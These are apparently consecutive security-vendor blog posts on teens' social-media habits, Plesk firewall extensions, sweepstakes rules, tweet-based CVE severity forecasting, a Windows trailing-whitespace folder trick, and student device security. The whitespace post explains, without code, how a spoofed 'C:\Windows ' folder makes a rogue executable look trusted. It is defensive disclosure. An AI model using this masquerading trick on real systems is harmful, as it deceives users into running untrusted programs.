  1. Your Kids Are So Much More Than Their Likes Tally

It is not uncommon for tweens and teens to judge their worth by the number of followers or likes they receive on their social media posts. Clearly, this is crazy but a common trend/ So, please discuss the irrationality of the likes culture and online popularity contest that has become a feature of almost all social media platforms. Make sure they understand that social media platforms play on the ‘reward loop’ that keep us coming back for more. Likes on our posts and validating comments from our followers provide hits of dopamine that means we find it hard to step away. While many tweens and teens view likes as a measure of social acceptance, it is essential that you continue to tell them that this is not a true measure of a person.

  1. Encourage Off-Line Activities

Help your kids develop skills and relationships that are not dependent on screens. Fill their time with activities that build face-to-face friendships and develop their individual talents. Whether it’s sport, music, drama, volunteering or even a part time job – ensuring your child has a life away from screens is essential to creating balance.

  1. Education is Key

Teaching your kids to be cyber safe and good digital citizens will minimise the chances of them experiencing any issues online. Reminding them about the perils of oversharing online, the importance of proactively managing their digital reputation and the harsh reality of online predators will prepare them for the inevitable challenges they will have to navigate.

  1. Keep the Communication Channels Open – Always!

Ensuring your kids really understand that they can speak to you about ANYTHING that is worrying them online is one of the best digital parenting insurance policies available. If they do come to you with an issue, it is essential that you remain calm and do not threaten to disconnect them from their online life. Whether it’s cyberbullying, inappropriate texting or a leak of their personal information, working with them to troubleshoot and solve problems and challenges they face is a must for all digital parents.

Like many parents, I wish I could wave a magic wand and get rid of the competition the likes culture has created online for many of our teens. But that is not possible. So, instead let’s work with our kids to educate them about its futility and help them develop a genuine sense of self-worth that will buffer them from harshness this likes culture has created.

Alex xx

The post How To Help Your Kids Manage Our ‘Culture of Likes’ appeared first on McAfee Blogs.

Top 6 Plesk Security Extensions You Should Consider for Website Security

As one of the most popular hosting platforms alongside cPanel, Plesk provides a variety of security extensions for its users. Each Plesk security extension boosts their own unique features, meant to fully protect your website, server, email, and network from potential threats.

Some extensions on Plesk require advanced system administration, so it’s important that you choose the right security tools based on your knowledge and experience — as not all security extensions are created equal. 

While Plesk offers a range of security tools such as malware scanners or ransomware protection software, this blog post will focus on security extensions that are available on Plesk that provide protection against web application attacks and DoS and DDoS attacks. 

These types of web threats directly affect web applications and can result in your websites going offline. In this case, customers and visitors are denied access to your information and commercial services, which will negatively impact your business’s bottom line.

Take a look below at some of the most popular security extensions available on Plesk and how they can help prevent web attacks as well as their potential shortcomings. 

BitNinja

BitNinja specializes in server security; their Plesk security extension is designed to effectively eliminate threats from your Linux servers. The security extension is also meant to save you from having to perform any configurations and spend long hours of troubleshooting.

Because BitNinja’s security extension is equipped with DoS mitigation and a WAF (web application firewall), they protect against web application and DDoS attacks. Their DDoS mitigation works based on TCP based protocols, but instead of permanently blocking the IP source they “greylist” the attacker IP.

On the WAF side, they analyze incoming traffic to your server based on different factors and stops attacks against the applications running on your server. They utilize the same WAF model used by Cloudflare and Incapsula. More specifically, for their reverse proxy engine, they use Nginx, WAF engine by ModSecurity, and a ruleset from the OWASP. One downside to BitNinja is that they are unable to constantly update and finetune the WAF ruleset or implement other rulesets in real time. 

Variti DDoS

The Variti DDoS security extension focuses on protection against DoS and DDoS attacks. They do this by allowing incoming web traffic to pass through a distributed network of filtering nodes. Then, traffic is analyzed in real time and classified as either legitimate or illegitimate. Upon detection of a threat, their Active Bot Protection (ABP) technology immediately blocks this malicious traffic with a response time of less than 50 ms.

Because of this bot protection technology, Variti is able to distinguish traffic between real users and bots, including those coming from the same IP address. Thus, they can also protect against both network and application layer DDoS attacks.  Though it doesn’t offer a WAF, Variti is one of the few DDoS protection tools that are available on Plesk. 

ModSecurity

ModSecurity is arguably one of the most well-known WAFs. They support web servers such as Apache on Linux or IIS on Windows, to protect web applications from malicious attacks. ModSecurity works by checking incoming HTTP requests and based on the set of rules applied, ModSecurity either allows the HTTP request to enter the website or blocks it. 

The ModSecurity security extension on Plesk offers both free and paid sets of rules. It includes regular expressions that are used for HTTP requests filtering, but you can also apply custom rulesets. This may require extensive knowledge on WAF rules by the system administrator. For example, you may need to manually switch off certain security rules so maintenance of the rulesets can be a setback for those who are looking for a more hands-off WAF.

Furthermore, there have also been cases where customers experience ModSecurity blocking legitimate requests too when too many rules are applied. 

Cloudflare Servershield 

The Cloudflare Servershield security extension is intended to protect and secure your servers, applications and APIs against DoS/DDoS and other web attacks. While the security extension is primarily used to speed up websites, Cloudflare Servershield also offers WAF and DDoS protection.

Cloudflare’s WAF option and its rulesets can only be enabled on their paid plans – more specifically the Cloudflare Servershield Advanced extension on Plesk. Cloudflare’s WAF uses the OWASP Modsecurity Core Rule Set to inspect web traffic and block illegitimate requests. These OWASP rules are supplemented by Cloudflare’s built-in rules that you can apply with the click of a button. 

As part of their free plan, Cloudflare provides unlimited and unmetered mitigation of DDoS attacks, regardless of the size of an attack.

Imunify360

Imunify360 takes a multi-layered approach when it comes to server security. This security extension combines an advanced firewall, WAF, IDS/IPS, and more. Their advanced firewall is also powered by a machine learning engine. They take a proactive defense to preemptively stop all malware and identify potential attacks on your server. 

Their WAF protects web servers from multiple threats, such as DoS attacks, port scans, and distributed brute force attacks. Their WAF also relies on ModSecurity and is automatically installed on certain versions of Imunify360. Because other third-party ModSecurity vendor’s rulesets may be installed (for example, OWASP or Comodo), these rulesets can generate a large number of false-positives and may duplicate Imunify360’s rulesets.

You will need to manually disable other third-party ModSecurity vendors on different hosting panels.

Cloudbric

To simplify the management of website security, Cloudbric’s cloud-based WAF is integrated with the Plesk platform. The Cloudbric WAF extension also includes DDoS protection and SSL certificate renewal automation at no extra cost. 

Instead of painfully blocking the customer’s IP address individually to keep DDoS attacks under control, Cloudbric blocks these huge amounts of traffic before it reaches the site. Cloudbric’s advanced DDos protection ensures your website stays up and running. 

The Cloudbric WAF is designed to install and work with as little human interaction as possible. We handle the security so that customers don’t have to. Unlike ModSecurity which maintains a library of malicious patterns, known as signatures, Cloudbric takes it up a notch by also implementing signature-less detection techniques into the WAF engine. 

Additionally, unlike the rules of ModSecurity that are updated once per month, Cloudbric’s WAF does not require signature updates. 

This signature-less detection technology can also identify and block modified and new web application attacks. Cloudbric’s WAF engine includes 27 unique pre-set rules and AI capabilities to create an advanced threat detection engine to accurately detect and block attacks. 

If your company is dependent on online traffic for business, then protection against DDoS and web application attacks is a must. 

For Plesk users, there are a variety of security extensions to choose from to make the management of security extremely easy for web managers, designers, system administrators, and other web professionals – it all depends on your security needs and whether you are looking for fully managed services or customization. 

If you need assistance with Cloudbric’s plesk extension email us at support@cloudbric.com.

The post Top 6 Plesk Security Extensions You Should Consider for Website Security appeared first on Cloudbric.

Backpacks Ready, Pencils Up – It’s Time for a Back-to-School #RT2Win

It’s time to unpack the suitcases and pack up those backpacks! With the summer season quickly coming to an end, it’s time to get those college cybersecurity priorities in order so you can have the best school year yet. As students across the country get ready to embark on—or return to—their college adventure, many are not proactively protecting their data according. A recent survey from McAfee. found that only 19% of students take extra steps to protect their academic records, which is surprising considering 80% of students have either been a victim of a cyberattack or know someone who has been impacted. In fact, in the first few months of 2019, publicly disclosed cyberattacks targeting the education sector increased by 50%, including financial aid schemes and identity theft.

From data breaches to phishing and ransomware attacks, hitting the books is stressful enough without the added pressure of ensuring your devises and data are secure too. But you’re in luck! Avoid being the cybersecurity class clown and head back to school in style with our A+ worthy Back-to-School RT2Win sweepstakes!

Three [3] lucky winners of the sweepstakes drawing will receive a McAfee Back-to-School Essentials Backpack complete with vital tech and cybersecurity supplies like Beats Headphones, UE BOOM Waterproof Bluetooth Speaker, Fujifilm Instax Mini 9 Instant Camera, DLINK router with McAfee Secure Home Platform, Anker PowerCore Portable Charger and so much more! ($750 value, full details below in Section 6. PRIZES). The best part? Entering is a breeze! Follow the instructions below to enter and good luck!

#RT2Win Sweepstakes Official Rules

  • To enter, go to https://twitter.com/McAfee_Home, and find the #RT2Win sweepstakes tweet.
  • The sweepstakes tweet will be released on Tuesday, August 13, 2019, at 12:00pm PT. This tweet will include the hashtags: #ProtectWhatMatters, #RT2Win AND #Sweepstakes.
  • Retweet the sweepstakes tweet released on the above date, from your own handle. The #ProtectWhatMatters, #RT2Win AND #Sweepstakes hashtags must be included to be entered.
  • Sweepstakes will end on Monday, August 26, 2019 at 11:59pm PT. All entries must be made before that date and time.
  • Winners will be notified on Wednesday, August 28, 2019, via Twitter direct message.
  • Limit one entry per person.

1. How to Win:

Retweet one of our contest tweets on @McAfee_Home that include “#ProtectWhatMatters, #RT2Win AND #Sweepstakes” for a chance to win a McAfee Back-to-School Essential Backpack (for full prize details please see “Prizes” section below). Three [3] total winners will be selected and announced on August 28, 2019. Winners will be notified by direct message on Twitter. For full Sweepstakes details, please see the Terms and Conditions, below.

#RT2Win Sweepstakes Terms and Conditions

2. How to Enter: 

No purchase necessary. A purchase will not increase your chances of winning. McAfee Back-to-School #RT2Win Sweepstakes will be conducted from August 13, 2019 through August 27, 2019. All entries for each day of the McAfee Back-to-School #RT2Win Sweepstakes must be received during the time allotted for the McAfee Back-to-School #RT2Win Sweepstakes. Pacific Daylight Time shall control the McAfee Back-to-School #RT2Win Sweepstakes, duration is as follows:

  • Begins Tuesday, August 13 at 12:00pm PST
  • Ends: Monday, August 26, 2019 at 11:59pm PST
  • Three [3] winners will be announced: Wednesday, August 28, 2019

For the McAfee Back-to-School #RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the McAfee Back-to-School Sweepstakes:

  1. Find the sweepstakes tweet of the day posted on @McAfee_Home which will include the hashtags: #ProtectWhatMatters, #RT2Win and #Sweepstakes
  2. Retweet the sweepstakes tweet of the day and make sure it includes the #ProtectWhatMatters, #RT2Win, and hashtags.
  3. Note: Tweets that do not contain the #ProtectWhatMatters, #RT2Win, and #Sweepstakes hashtags will not be considered for entry.
  4. Limit one entry per person.

Three [3] winners will be chosen for the McAfee Back-to-School #RT2Win Sweepstakes tweet from the viable pool of entries that retweeted and included #ProtectWhatMatters, #RT2Win and #Sweepstakes. McAfee and the McAfee social team will choose winners from all the viable entries. The winners will be announced and privately messaged on Wednesday, August 28, 2019 on the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes.  

3. Eligibility: 

McAfee Back-to-School #RT2Win Sweepstakes is open to all legal residents of the 50 United States who are 18 years of age or older on the dates of the McAfee Back-to-School #RT2Win Sweepstakes begins and live in a jurisdiction where this prize and McAfee Back-to-School #RT2Win Sweepstakes not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

4. Winner Selection:

Winners will be selected at random from all eligible retweets received during the McAfee Back-to-School #RT2Win Sweepstakes drawing entry period. Sponsor will select the names of three [3] potential winners of the prizes in a random drawing from among all eligible submissions at the address listed below. The odds of winning depend on the number of eligible entries received. By participating, entrants agree to be bound by the Official McAfee Back-to-School #RT2Win Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

5. Winner Notification: 

Each winner will be notified via direct message (“DM”) on Twitter.com by August 28, 2019. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited, and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty-four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above. 

6. Prizes: 

McAFEE BACK-TO-SCHOOL ESSENTIAL BACKPACK (3)

  • Approximate ARV for Prize: $750
    • McAfee Backpack
    • McAfee Water Bottle
    • McAfee Notebook
    • D-Link Ethernet Wireless Router with McAfee Secure Home
    • McAfee Total Protection, 5 devices, 1-year subscription
    • Beats EP On-Ear Headphones
    • Ultimate Ears BOOM Portable Waterproof Bluetooth Speaker
    • Fujifilm Instax Mini 9 Instant Camera with Mini Film Twin Pack
    • Tile Mate – Anything Finder
    • Anker PowerCore 10000, Portable Charger

Limit one (1) prize per person/household. Prizes are non-transferable, and no cash equivalent or substitution of prize is offered.

The prize for the McAfee Back-To-School #RT2Win Sweepstakes is a ONE (1) Back-to-School Essential Backpack, complete with the above supplies, for each of the three (3) entrants. Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Back-to-School #RT2Win Sweepstakes and all matters or disputes arising from the McAfee Back-to-School #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor. Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

7. General Conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner. Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the McAfee Back-to-School #RT2Win Sweepstakes, or by any technical or human error, which may occur in the processing of the McAfee Back-to-School #RT2Win Sweepstakes. entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the McAfee Back-to-School #RT2Win Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any McAfee Back-to-School #RT2Win Sweepstakes-related activity, or participation in the McAfee Back-to-School #RT2Win Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

8. Limitations of Liability; Releases:

By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

To the fullest extent permitted by applicable law, in no event will the sponsor or the released parties be liable for any special, indirect, incidental, or consequential damages, including loss of use, loss of profits or loss of data, whether in an action in contract, tort (including, negligence) or otherwise, arising out of or in any way connected to your participation in the sweepstakes or use or inability to use any equipment provided for use in the sweepstakes or any prize, even if a released party has been advised of the possibility of such damages.

  1. To the fullest extent permitted by applicable law, in no event will the aggregate liability of the released parties (jointly) arising out of or relating to your participation in the sweepstakes or use of or inability to use any equipment provided for use in the sweepstakes or any prize exceed $10. The limitations set forth in this section will not exclude or limit liability for personal injury or property damage caused by products rented from the sponsor, or for the released parties’ gross negligence, intentional misconduct, or for fraud.
  2. Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list).  As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation. By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

9. Prize Forfeiture:

If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with the prize McAfee Back-to-School #RT2Win Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each McAfee Back-to-School #RT2Win Sweepstakes.

10. Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Back-to-School #RT2Win Sweepstakes and all matters or disputes arising from the McAfee Back-to-School #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

11. Governing Law & Disputes:

Each entrant agrees that any disputes, claims, and causes of action arising out of or connected with this sweepstakes or any prize awarded will be resolved individually, without resort to any form of class action and these rules will be construed in accordance with the laws, jurisdiction, and venue of New York.

12. Privacy Policy: 

Personal information obtained in connection with this prize McAfee Back-to-School #RT2Win Sweepstakes will be handled in accordance policy set forth at http://www.mcafee.com/us/about/privacy.html.

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after August 13,2019 before August 27, 2019 to the address listed below, Attn: #RT2Win at CES Sweepstakes.  To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed in below, Attn: Sarah Grayson. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2019 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd. Santa Clara, CA 95054 USA
  4. Administrator: LEWIS, 111 Sutter St., Suite 850, San Francisco, CA 94104

The post Backpacks Ready, Pencils Up – It’s Time for a Back-to-School #RT2Win appeared first on McAfee Blogs.

Showing Vulnerability to a Machine: Automated Prioritization of Software Vulnerabilities

Introduction

If a software vulnerability can be detected and remedied, then a potential intrusion is prevented. While not all software vulnerabilities are known, 86 percent of vulnerabilities leading to a data breach were patchable, though there is some risk of inadvertent damage when applying software patches. When new vulnerabilities are identified they are published in the Common Vulnerabilities and Exposures (CVE) dictionary by vulnerability databases, such as the National Vulnerability Database (NVD).

The Common Vulnerabilities Scoring System (CVSS) provides a metric for prioritization that is meant to capture the potential severity of a vulnerability. However, it has been criticized for a lack of timeliness, vulnerable population representation, normalization, rescoring and broader expert consensus that can lead to disagreements. For example, some of the worst exploits have been assigned low CVSS scores. Additionally, CVSS does not measure the vulnerable population size, which many practitioners have stated they expect it to score. The design of the current CVSS system leads to too many severe vulnerabilities, which causes user fatigue. ­

To provide a more timely and broad approach, we use machine learning to analyze users’ opinions about the severity of vulnerabilities by examining relevant tweets. The model predicts whether users believe a vulnerability is likely to affect a large number of people, or if the vulnerability is less dangerous and unlikely to be exploited. The predictions from our model are then used to score vulnerabilities faster than traditional approaches, like CVSS, while providing a different method for measuring severity, which better reflects real-world impact.

Our work uses nowcasting to address this important gap of prioritizing early-stage CVEs to know if they are urgent or not. Nowcasting is the economic discipline of determining a trend or a trend reversal objectively in real time. In this case, we are recognizing the value of linking social media responses to the release of a CVE after it is released, but before it is scored by CVSS. Scores of CVEs should ideally be available as soon as possible after the CVE is released, while the current process often hampers prioritization of triage events and ultimately slows response to severe vulnerabilities. This crowdsourced approach reflects numerous practitioner observations about the size and widespread nature of the vulnerable population, as shown in Figure 1. For example, in the Mirai botnet incident in 2017 a massive number of vulnerable IoT devices were compromised leading to the largest Denial of Service (DoS) attack on the internet at the time.


Figure 1: Tweet showing social commentary on a vulnerability that reflects severity

Model Overview

Figure 2 illustrates the overall process that starts with analyzing the content of a tweet and concludes with two forecasting evaluations. First, we run Named Entity Recognition (NER) on tweet contents to extract named entities. Second, we use two classifiers to test the relevancy and severity towards the pre-identified entities. Finally, we match the relevant and severe tweets to the corresponding CVE.


Figure 2: Process overview of the steps in our CVE score forecasting

Each tweet is associated to CVEs by inspecting URLs or the contents hosted at a URL. Specifically, we link a CVE to a tweet if it contains a CVE number in the message body, or if the URL content contains a CVE. Each tweet must be associated with a single CVE and must be classified as relevant to security-related topics to be scored. The first forecasting task considers how well our model can predict the CVSS rankings ahead of time. The second task is predicting future exploitation of the vulnerability for a CVE based on Symantec Antivirus Signatures and Exploit DB. The rationale is that eventual presence in these lists indicates not just that exploits can exist or that they do exist, but that they also are publicly available.

Modeling Approach

Predicting the CVSS scores and exploitability from Twitter data involves multiple steps. First, we need to find appropriate representations (or features) for our natural language to be processed by machine learning models. In this work, we use two natural language processing methods in natural language processing for extracting features from text: (1) N-grams features, and (2) Word embeddings. Second, we use these features to predict if the tweet is relevant to the cyber security field using a classification model. Third, we use these features to predict if the relevant tweets are making strong statements indicative of severity. Finally, we match the severe and relevant tweets up to the corresponding CVE.

N-grams are word sequences, such as word pairs for 2-gram or word triples for 3-grams. In other words, they are contiguous sequence of n words from a text. After we extract these n-grams, we can represent original text as a bag-of-ngrams. Consider the sentence:

A criticial vulnerability was found in Linux.

If we consider all 2-gram features, then the bag-of-ngrams representation contains “A critical”, “critical vulnerability”, etc.

Word embeddings are a way to learn the meaning of a word by how it was used in previous contexts, and then represent that meaning in a vector space. Word embeddings know the meaning of a word by the company it keeps, more formally known as the distribution hypothesis. These word embedding representations are machine friendly, and similar words are often assigned similar representations. Word embeddings are domain specific. In our work, we additionally train terminology specific to cyber security topics, such as related words to threats are defenses, cyberrisk, cybersecurity, threat, and iot-based. The embedding would allow a classifier to implicitly combine the knowledge of similar words and the meaning of how concepts differ. Conceptually, word embeddings may help a classifier use these embeddings to implicitly associate relationships such as:

device + infected = zombie

where an entity called device has a mechanism applied called infected (malicious software infecting it) then it becomes a zombie.

To address issues where social media tweets differ linguistically from natural language, we leverage previous research and software from the Natural Language Processing (NLP) community. This addresses specific nuances like less consistent capitalization, and stemming to account for a variety of special characters like ‘@’ and ‘#’.


Figure 3: Tweet demonstrating value of identifying named entities in tweets in order to gauge severity

Named Entity Recognition (NER) identifies the words that construct nouns based on their context within a sentence, and benefits from our embeddings incorporating cyber security words. Correctly identifying the nouns using NER is important to how we parse a sentence. In Figure 3, for instance, NER facilitates Windows 10 to be understood as an entity while October 2018 is treated as elements of a date. Without this ability, the text in Figure 3 may be confused with the physical notion of windows in a building.

Once NER tokens are identified, they are used to test if a vulnerability affects them. In the Windows 10 example, Windows 10 is the entity and the classifier will predict whether the user believes there is a serious vulnerability affecting Windows 10. One prediction is made per entity, even if a tweet contains multiple entities. Filtering tweets that do not contain named entities reduces tweets to only those relevant to expressing observations on a software vulnerability.

From these normalized tweets, we can gain insight into how strongly users are emphasizing the importance of the vulnerability by observing their choice of words. The choice of adjective is instrumental in the classifier capturing the strong opinions. Twitter users often use strong adjectives and superlatives to convey magnitude in a tweet or when stressing the importance of something related to a vulnerability like in Figure 4. This magnitude often indicates to the model when a vulnerability’s exploitation is widespread. Table 1 shows our analysis of important adjectives that tend to indicate a more severe vulnerability.


Figure 4: Tweet showing strong adjective use


Table 1: Log-odds ratios for words correlated with highly-severe CVEs

Finally, the processed features are evaluated with two different classifiers to output scores to predict relevancy and severity. When a named entity is identified all words comprising it are replaced with a single token to prevent the model from biasing toward that entity. The first model uses an n-gram approach where sequences of two, three, and four tokens are input into a logistic regression model. The second approach uses a one-dimensional Convolutional Neural Network (CNN), comprised of an embedding layer, a dropout layer then a fully connected layer, to extract features from the tweets.

Evaluating Data

To evaluate the performance of our approach, we curated a dataset of 6,000 tweets containing the keywords vulnerability or ddos from Dec 2017 to July 2018. Workers on Amazon’s Mechanical Turk platform were asked to judge whether a user believed a vulnerability they were discussing was severe. For all labeling, multiple users must independently agree on a label, and multiple statistical and expert-oriented techniques are used to eliminate spurious annotations. Five annotators were used for the labels in the relevancy classifier and ten annotators were used for the severity annotation task. Heuristics were used to remove unserious respondents; for example, when users did not agree with other annotators for a majority of the tweets. A subset of tweets were expert-annotated and used to measure the quality of the remaining annotations.

Using the features extracted from tweet contents, including word embeddings and n-grams, we built a model using the annotated data from Amazon Mechanical Turk as labels. First, our model learns if tweets are relevant to a security threat using the annotated data as ground truth. This would remove a statement like “here is how you can #exploit tax loopholes” from being confused with a cyber security-related discussion about a user exploiting a software vulnerability as a malicious tool. Second, a forecasting model scores the vulnerability based on whether annotators perceived the threat to be severe.

CVSS Forecasting Results

Both the relevancy classifier and the severity classifier were applied to various datasets. Data was collected from December 2017 to July 2018. Most notably 1,000 tweets were held-out from the original 6,000 to be used for the relevancy classifier and 466 tweets were held-out for the severity classifier. To measure the performance, we use the Area Under the precision-recall Curve (AUC), which is a correctness score that summarizes the tradeoffs of minimizing the two types of errors (false positive vs false negative), with scores near 1 indicating better performance.

  • The relevancy classifier scored 0.85
  • The severity classifier using the CNN scored 0.65
  • The severity classifier using a Logistic Regression model, without embeddings, scored 0.54

Next, we evaluate how well this approach can be used to forecast CVSS ratings. In this evaluation, all tweets must occur a minimum of five days ahead of CVSS scores. The severity forecast score for a CVE is defined as the maximum severity score among the tweets which are relevant and associated with the CVE. Table 1 shows the results of three models: randomly guessing the severity, modeling based on the volume of tweets covering a CVE, and the ML-based approach described earlier in the post. The scoring metric in Table 2 is precision at top K using our logistic regression model. For example, where K=100, this is a way for us to identify what percent of the 100 most severe vulnerabilities were correctly predicted. The random model would predicted 59, while our model predicted 78 of the top 100 and all ten of the most severe vulnerabilities.


Table 2: Comparison of random simulated predictions, a model based just on quantitative features like “likes”, and the results of our model

Exploit Forecasting Results

We also measured the practical ability of our model to identify the exploitability of a CVE in the wild, since this is one of the motivating factors for tracking. To do this, we collected severe vulnerabilities that have known exploits by their presence in the following data sources:

  • Symantec Antivirus signatures
  • Symantec Intrusion Prevention System signatures
  • ExploitDB catalog

The dataset for exploit forecasting was comprised of 377,468 tweets gathered from January 2016 to November 2017. Of the 1,409 CVEs used in our forecasting evaluation, 134 publicly weaponized vulnerabilities were found across all three data sources.

Using CVEs from the aforementioned sources as ground truth, we find our CVE classification model is more predictive of detecting operationalized exploits from the vulnerabilities than CVSS. Table 3 shows precision scores illustrating seven of the top ten most severe CVEs and 21 of the top 100 vulnerabilities were found to have been exploited in the wild. Compare that to one of the top ten and 16 of the top 100 from using the CVSS score itself. The recall scores show the percentage of our 134 weaponized vulnerabilities found in our K examples. In our top ten vulnerabilities, seven were found to be in the 134 (5.2%), while the CVSS scoring’s top ten included only one (0.7%) CVE being exploited.


Table 3: Precision and recall scores for the top 10, 50 and 100 vulnerabilities when comparing CVSS scoring, our simplistic volume model and our NLP model

Conclusion

Preventing vulnerabilities is critical to an organization’s information security posture, as it effectively mitigates some cyber security breaches. In our work, we found that social media content that pre-dates CVE scoring releases can be effectively used by machine learning models to forecast vulnerability scores and prioritize vulnerabilities days before they are made available. Our approach incorporates a novel social sentiment component, which CVE scores do not, and it allows scores to better predict real-world exploitation of vulnerabilities. Finally, our approach allows for a more practical prioritization of software vulnerabilities effectively indicating the few that are likely to be weaponized by attackers. NIST has acknowledged that the current CVSS methodology is insufficient. The current process of scoring CVSS is expected to be replaced by ML-based solutions by October 2019, with limited human involvement. However, there is no indication of utilizing a social component in the scoring effort.

This work was led by researchers at Ohio State under the IARPA CAUSE program, with support from Leidos and FireEye. This work was originally presented at NAACL in June 2019, our paper describes this work in more detail and was also covered by Wired.

The Twin Journey, Part 3: I’m Not a Twin, Can’t You See my Whitespace at the End?

In this series of 3 blogs (you can find part 1 here, and part 2 here), so far we have understood the implications of promoting files to “Evil Twins” where they can be created and remain in the system as different entities once case sensitiveness is enabled, and some issues that could be raised by just basic assumptions on case-sensitiveness during development.

In this 3rd post we focus on the “confusion” technique, where even though the technique is already known (Medium / Tyranidslair), the ramifications of these effects have not all been analyzed yet.

Going back to normalization, some Win32 API’s remove trailing whitespaces (and other special characters) from the path name.

As mentioned in the last publication, the normalization can, in some cases, provide the wrong result.

The common scenario that could be used as “bait” for the user to click, and even to hide what is seen, is to create a directory with the same name ending with a whitespace.

A very trivial example “That’s not my notepad…..”:

Open task manager, Right click on the “notepad” with putty icon -> Properties. (The properties were read from the “non-trailing-space” binary)

Open Explorer on “C:\Windows “; it will generate the illusion that the original files (from the folder without trailing whitespace) are there. This will happen for any folder/file not present in the whitespace version.

Screenshots opening a McAfee Agent Folder:

Both folders opened; note that the whitespace version does not have any .dll or additional .exe but Explorer renders the missing files from the “normalized – non-whitespace directory”.

Trying to open the dll…

Getting properties from task manager will fetch those from the normalized folder path, that means you can be tricked to think it is a trusted app.

Watch the video recorded by our expert Cedric Cochin illustrating this technique:

Related Links / Blogs:

https://tyranidslair.blogspot.com/2019/02/ntfs-case-sensitivity-on-windows.html

https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e

The post The Twin Journey, Part 3: I’m Not a Twin, Can’t You See my Whitespace at the End? appeared first on McAfee Blogs.

Dorms, Degrees, and Data Security: Prepare Your Devices for Back to School Season

With summer coming to a close, it’s almost time for back to school! Back to school season is an exciting time for students, especially college students, as they take their first steps towards independence and embark on journeys that will shape the rest of their lives. As students across the country prepare to start or return to college, we here at McAfee have revealed new findings indicating that many are not proactively protecting their academic data. Here are the key takeaways from our survey of 1,000 Americans, ages 18-25, who attend or have attended college:

Education Needs to Go Beyond the Normal Curriculum

While many students are focused on classes like biology and business management, very few get the proper exposure to cybersecurity knowledge. 80% of students have been affected by a cyberattack or know a friend or family member who has been affected. However, 43% claim that they don’t think they will ever be a victim of a cybercrime in the future.

Educational institutions are very careful to promote physical safety, but what about cyber safety? It turns out only 36% of American students claim that they have learned how to keep personal information safe through school resources. According to 42% of our respondents, they learn the most about cybersecurity from the news. To help improve cybersecurity education in colleges and universities, these institutions should take a certain level of responsibility when it comes to training students on how they can help keep their precious academic data safe from cybercriminals.

Take Notes on Device Security

Believe it or not, many students fail to secure all of their devices, opening them up to even more vulnerabilities. While half of students have security software installed on their personal computers, this isn’t the case for their tablets or smartphones. Only 37% of students surveyed have smartphone protection, and only 13% have tablet protection. What’s more, about one in five (21%) students don’t use any cybersecurity products at all.

Class Dismissed: Cyberattacks Targeting Education Are on the Rise

According to data from McAfee Labs, cyberattacks targeting education in Q1 2019 have increased by 50% from Q4 2018. The combination of many students being uneducated in proper cybersecurity hygiene and the vast array of shared networks that these students are simultaneously logged onto gives cybercriminals plenty of opportunities to exploit when it comes to targeting universities. Some of the attacks utilized include account hijacking and malware, which made up more than 70% of attacks on these institutions from January to May of 2019. And even though these attacks are on the rise, 90% of American students still use public Wi-Fi and only 18% use a VPN to protect their devices.

Become a Cybersecurity Scholar

In order to go into this school year with confidence, students should remember these security tips:

  • Never reuse passwords. Use a unique password for each one of your accounts, even if it’s for an account that doesn’t hold a lot of personal information. You can also use a password manager so you don’t have to worry about remembering various logins.
